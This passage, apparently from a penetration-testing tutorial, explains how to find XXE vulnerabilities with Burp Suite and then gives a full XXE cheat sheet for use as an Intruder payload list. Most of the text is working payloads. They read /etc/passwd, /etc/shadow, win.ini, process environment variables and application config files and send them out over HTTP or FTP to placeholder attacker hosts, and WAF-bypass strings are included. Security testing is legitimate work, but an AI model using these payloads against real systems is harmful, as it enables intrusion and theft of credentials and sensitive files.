Detecting XML-related issues, such as XXE

XML issues require that the request accept XML, so this must be indicated in the request's Content-Type header, with one of the following values:

text/xml
application/xml

We can configure a filter in Burp Suite to detect requests that carry this information in their headers. To configure the filter, go to the Target tool, and then click on the Filter bar. Once there, select the XML file format and, optionally, enter the Content-Type string that we know all candidate requests must have, as shown in the following screenshot:

After filtering the requests that could be vulnerable, add common testing strings as a payload list in the Intruder tool, as with the previous vulnerabilities, and launch them against all the potential requests. For example, one of the most common strings used to detect XXE is the following:

<!ENTITY % three SYSTEM "file:///etc/passwd">

When the file's contents appear in the response, you have detected a vulnerability. Note that the absence of file contents in the response does not rule out XXE: a blind (out-of-band) variant only reveals itself through a callback to a host you control, which is what several of the payloads below test for. I recommend using the following cheat sheet, created by Etienne Stalmans, as a payload list in Intruder:

-------------------------------------------------------------- 
Vanilla, used to verify outbound xxe or blind xxe 
-------------------------------------------------------------- 
 
<?xml version="1.0" ?> 
<!DOCTYPE r [ 
<!ELEMENT r ANY > 
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> 
]> 
<r>&sp;</r> 
 
--------------------------------------------------------------- 
OoB extraction 
--------------------------------------------------------------- 
 
<?xml version="1.0" ?> 
<!DOCTYPE r [ 
<!ELEMENT r ANY > 
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> 
%sp; 
%param1; 
]> 
<r>&exfil;</r> 
 
## External dtd: ## 
 
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> 
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> 
 
---------------------------------------------------------------- 
OoB variation of above (seems to work better against .NET) 
---------------------------------------------------------------- 
<?xml version="1.0" ?> 
<!DOCTYPE r [ 
<!ELEMENT r ANY > 
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> 
%sp; 
%param1; 
%exfil; 
]> 
 
## External dtd: ## 
 
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> 
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> 
 
--------------------------------------------------------------- 
OoB extraction 
--------------------------------------------------------------- 
 
<?xml version="1.0"?> 
<!DOCTYPE r [ 
<!ENTITY % data3 SYSTEM "file:///etc/shadow"> 
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd"> 
%sp; 
%param3; 
%exfil; 
]> 
 
## External dtd: ## 
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://Evilhost:port/%data3;'>"> 
 
----------------------------------------------------------------------- 
OoB extra ERROR -- Java 
----------------------------------------------------------------------- 
<?xml version="1.0"?> 
<!DOCTYPE r [ 
<!ENTITY % data3 SYSTEM "file:///etc/passwd"> 
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd"> 
%sp; 
%param3; 
%exfil; 
]> 
<r></r> 
## External dtd: ## 
 
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external; 
 
 
----------------------------------------------------------------------- 
OoB extra nice 
----------------------------------------------------------------------- 
 
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE root [ 
 <!ENTITY % start "<![CDATA["> 
 <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml "> 
<!ENTITY % end "]]>"> 
<!ENTITY % dtd SYSTEM "http://evil/evil.xml"> 
%dtd; 
]> 
<root>&all;</root> 
  
## External dtd: ## 
  
<!ENTITY all "%start;%stuff;%end;"> 
 
------------------------------------------------------------------ 
File-not-found exception based extraction 
------------------------------------------------------------------ 
 
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE test [   
  <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" > 
  %one; 
  %two; 
  %four; 
]> 
 
## External dtd: ## 
 
<!ENTITY % three SYSTEM "file:///etc/passwd"> 
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> 
 
-------------------------^ you might need to encode this % (depends on your target) as: % 
 
-------------- 
FTP 
-------------- 
<?xml version="1.0" ?> 
<!DOCTYPE a [  
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd"> 
%asd; 
%c; 
]> 
<a>&rrr;</a> 
 
 
## External dtd ## 
<!ENTITY % d SYSTEM "file:///proc/self/environ"> 
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> 
 
--------------------------- 
Inside SOAP body 
--------------------------- 
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> 
 
 
--------------------------- 
Untested - WAF Bypass 
--------------------------- 
<!DOCTYPE :. SYTEM "http://" 
<!DOCTYPE :_-_: SYTEM "http://" 
<!DOCTYPE {0xdfbf} SYSTEM "http://" 
